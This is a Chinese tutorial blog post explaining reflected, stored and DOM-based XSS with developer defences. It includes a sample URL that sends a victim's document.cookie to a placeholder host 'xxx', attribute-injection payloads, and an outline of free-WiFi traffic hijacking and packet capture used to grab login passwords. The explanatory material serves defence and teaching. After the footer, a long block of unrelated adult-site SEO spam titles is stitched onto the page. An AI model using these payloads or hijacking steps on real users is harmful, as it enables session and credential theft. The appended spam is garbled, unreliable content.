億萬聯(lián)合 — 專業(yè)網(wǎng)站建設(shè)服務(wù)商 4008-4008-80
          您的位置:首頁 > 資訊 > 網(wǎng)絡(luò)學(xué)堂

          網(wǎng)站安全之XSS攻擊

          發(fā)布時間:2017年08月07日作者:波哥 瀏覽:9467

          XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見的Web攻擊,其重點是“跨域”和“客戶端執(zhí)行”。

          有人將XSS攻擊分為三種,分別是:

          1. Reflected XSS(基于反射的XSS攻擊)

          2. Stored XSS(基于存儲的XSS攻擊)

          3. DOM-based or local XSS(基于DOM或本地的XSS攻擊)


          Reflected XSS

          基于反射的XSS攻擊,主要依靠站點服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊。

          例子:

          1. 做個假設(shè),當(dāng)亞馬遜在搜索書籍,搜不到書的時候顯示提交的名稱。

          2. 在搜索框搜索內(nèi)容,填入“<script>alert('handsome boy')</script>”, 點擊搜索。

          3. 當(dāng)前端頁面沒有對返回的數(shù)據(jù)進行過濾,直接顯示在頁面上, 這時就會alert那個字符串出來。

          4. 進而可以構(gòu)造獲取用戶cookies的地址,通過QQ群或者垃圾郵件,來讓其他人點擊這個地址:

          http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>

          PS:這個地址當(dāng)然是沒效的,只是舉例子而已。

          結(jié)論:

          如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個像樣的XSS攻擊。

          開發(fā)安全措施:

          1. 前端在顯示服務(wù)端數(shù)據(jù)時候,不僅是標簽內(nèi)容需要過濾、轉(zhuǎn)義,就連屬性值也都可能需要。

          2. 后端接收請求時,驗證請求是否為攻擊請求,攻擊則屏蔽。

          例如:

          標簽:

          <span><script>alert('handsome boy')</script></span>
          轉(zhuǎn)義
          <span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>
          屬性:

          如果一個input的value屬性值是

          瑯琊榜" onclick="javascript:alert('handsome boy')
          就可能出現(xiàn)

          <input type="text" value="瑯琊榜" onclick="javascript:alert('handsome boy')">

          點擊input導(dǎo)致攻擊腳本被執(zhí)行,解決方式可以對script或者雙引號進行過濾。


          Stored XSS

          基于存儲的XSS攻擊,是通過發(fā)表帶有惡意跨域腳本的帖子/文章,從而把惡意腳本存儲在服務(wù)器,每個訪問該帖子/文章的人就會觸發(fā)執(zhí)行。

          例子:

          1. 發(fā)一篇文章,里面包含了惡意腳本

          今天天氣不錯啊!<script>alert('handsome boy')</script>
          2. 后端沒有對文章進行過濾,直接保存文章內(nèi)容到數(shù)據(jù)庫。


          3. 當(dāng)其他看這篇文章的時候,包含的惡意腳本就會執(zhí)行。

          PS:因為大部分文章是保存整個HTML內(nèi)容的,前端顯示時候也不做過濾,就極可能出現(xiàn)這種情況。

          結(jié)論:

          后端盡可能對提交數(shù)據(jù)做過濾,在場景需求而不過濾的情況下,前端就需要做些處理了。

          開發(fā)安全措施:

          1. 首要是服務(wù)端要進行過濾,因為前端的校驗可以被繞過。

          2. 當(dāng)服務(wù)端不校驗時候,前端要以各種方式過濾里面可能的惡意腳本,例如script標簽,將特殊字符轉(zhuǎn)換成HTML編碼。

          DOM-based or local XSS

          基于DOM或本地的XSS攻擊。一般是提供一個免費的wifi,但是提供免費wifi的網(wǎng)關(guān)會往你訪問的任何頁面插入一段腳本或者是直接返回一個釣魚頁面,從而植入惡意腳本。這種直接存在于頁面,無須經(jīng)過服務(wù)器返回就是基于本地的XSS攻擊。


          例子1:
          1. 提供一個免費的wifi。
          1. 開啟一個特殊的DNS服務(wù),將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設(shè)置為我們的電腦IP。
          2. 之后連上wifi的用戶打開任何網(wǎng)站,請求都將被我們截取到。我們根據(jù)http頭中的host字段來轉(zhuǎn)發(fā)到真正服務(wù)器上。
          3. 收到服務(wù)器返回的數(shù)據(jù)之后,我們就可以實現(xiàn)網(wǎng)頁腳本的注入,并返回給用戶。
          4. 當(dāng)注入的腳本被執(zhí)行,用戶的瀏覽器將依次預(yù)加載各大網(wǎng)站的常用腳本庫。


          PS:例子和圖片來自,http://www.cnblogs.com/index-html/p/wifi_hijack_3.html 不是我寫的,請注意!
          這個其實就是wifi流量劫持,中間人可以看到用戶的每一個請求,可以在頁面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚頁面。



          例子2:
          1. 還是提供一個免費wifi
          2. 在我們電腦上進行抓包
          3. 分析數(shù)據(jù),可以獲取用戶的微信朋友圈、郵箱、社交網(wǎng)站帳號數(shù)據(jù)(HTTP)等。


          PS:這個是我的測試,在51job頁面登錄時進行抓包,可以獲取帳號密碼。



          結(jié)論:
          這攻擊其實跟網(wǎng)站本身沒有什么關(guān)系,只是數(shù)據(jù)被中間人獲取了而已,而由于HTTP是明文傳輸?shù)模允菢O可能被竊取的。


          開發(fā)安全措施:
          1. 使用HTTPS!就跟我前面《HTTP與HTTPS握手的那些事》這篇文章說的,HTTPS會在請求數(shù)據(jù)之前進行一次握手,使得客戶端與服務(wù)端都有一個私鑰,服務(wù)端用這個私鑰加密,客戶端用這個私鑰解密,這樣即使數(shù)據(jù)被人截取了,也是加密后的數(shù)據(jù)。

          總結(jié)

          XSS攻擊的特點就是:盡一切辦法在目標網(wǎng)站上執(zhí)行非目標網(wǎng)站上原有的腳本(某篇文章說的)。本地的XSS攻擊的示例2其實不算XSS攻擊,只是簡單流量劫持。前兩種XSS攻擊是我們開發(fā)時候要注意的,而流量劫持的則可以使用HTTPS提高安全性。

          740
          分類:

          您還沒有登錄,請先登錄

          4008-4008-80

          027-87827780

          請點擊QQ圖標咨詢客服;為避免丟失消息,請?zhí)砑観Q好友
          提交需求
          主站蜘蛛池模板: 亚洲国产一成人久久精品| 欧美e片成人在线播放乱妇| 97成人碰碰久久人人超级碰OO| 国产成人免费片在线观看| 亚洲国产成人va在线观看网址| 欧美黄成人免费网站大全| 女性成人毛片a级| 青青草视频成人| 国产成人免费永久播放视频平台| 亚洲av午夜成人片精品网站| 成人无码免费一区二区三区| 国产成人精品一区二区三区无码 | 久久精品成人一区二区三区 | 亚洲精品成人片在线观看精品字幕| 91成人午夜性a一级毛片| 国产成人麻豆精品午夜福利在线| 色噜噜狠狠成人网| 国产成人亚洲综合一区| 成人午夜视频免费| 欧美成人精品第一区二区三区| 国产成人av三级在线观看| 成人亚洲欧美日韩在线| 最新69堂国产成人精品视频| 亚洲av成人精品网站在线播放 | 亚洲国产成人99精品激情在线| 成人午夜在线视频| 欧美成人免费网站| www夜片内射视频日韩精品成人| 国产成人久久精品亚洲小说 | 成人欧美日韩一区二区三区| 中文国产成人久久精品小说| 亚洲AV成人噜噜无码网站| 免费无码成人av在线播放不卡| 国产成人精品免费视频大全可播放的 | 成人免费黄网站| 成人无码嫩草影院| 成人国产精品一级毛片视频| 成人网免费观看| 成人午夜18免费看| 国产成人精品视频网站| 国产成人无码精品久久二区三区|